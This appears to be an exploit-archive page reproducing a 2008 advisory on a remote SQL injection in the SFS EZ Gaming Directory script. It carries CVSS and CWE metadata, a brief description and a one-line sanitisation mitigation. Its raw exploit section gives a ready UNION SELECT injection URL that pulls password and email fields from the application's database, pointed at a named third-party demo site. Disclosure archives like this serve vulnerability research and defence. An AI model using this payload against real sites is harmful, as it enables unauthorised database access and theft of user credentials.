header-logo
Suggest Exploit
vendor:
SFS EZ Gaming Directory
by:
Darckc0de
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: SFS EZ Gaming Directory
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SFS EZ Gaming Directory (directory.php id) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in the SFS EZ Gaming Directory script. An attacker can exploit this vulnerability to inject arbitrary SQL commands into the application, allowing them to gain access to the database and potentially gain access to sensitive information.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

==================================================================================
   SFS EZ Gaming Directory (directory.php id) Remote SQL Injection Vulnerability
==================================================================================
			   __  __           __          
			   / / / /_  _______/ /__  __  __
			  / /_/ / / / / ___/ / _ \/ / / /
			 / __  / /_/ / /  / /  __/ /_/ / 
			/_/ /_/\__,_/_/  /_/\___/\__, /  
			                        /____/   
==================================================================================
----------------------------------------------------------------------------------
Website script: http://www.scripts-for-sites.info/index.php
----------------------------------------------------------------------------------
Exploit:      http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit]
----------------------------------------------------------------------------------
LiveDemo:
http://www.turnkeyzone.com/demos/gaming/directory.php?ax=list&l=list_by&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/*
----------------------------------------------------------------------------------
==================================================================================
Special Thx : Darckc0de
==================================================================================

# milw0rm.com [2008-10-31]

Navigation

Suggest Exploit

Services By CQR